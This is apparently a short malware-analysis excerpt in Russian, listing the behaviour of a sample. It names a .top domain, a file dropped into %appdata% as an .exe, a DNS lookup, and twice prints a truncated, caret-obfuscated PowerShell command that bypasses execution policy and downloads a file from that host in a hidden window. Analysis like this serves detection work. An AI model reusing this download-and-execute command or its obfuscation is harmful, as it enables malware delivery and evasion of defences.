Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^E^RsHEl^l^.^e^xe^ -eXECuT^ioNpO^Licy ^BYP^as^S ^-NOPrOf^i^lE -wind^O^wST^YLE ^hi^d^DEN (^neW-^O^bJ^ecT S^Yst^eM^.N^e^T.wEBClieNT)^.^D^O^w^n^LO^aD^fILE(^'http://roggistazl...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "poW^E^RsHEl^l^.^e^xe^ -eXECuT^ioNpO^Licy ^BYP^as^S ^-NOPrOf^i^lE -wind^O^wST^YLE ^hi^d^DEN (^neW-^O^bJ^ecT S^Yst^eM^.N^e^T.wEBClieNT)^.^D^O^w^n^LO^aD^fILE(^'http://roggistazl...' (со скрытым окном)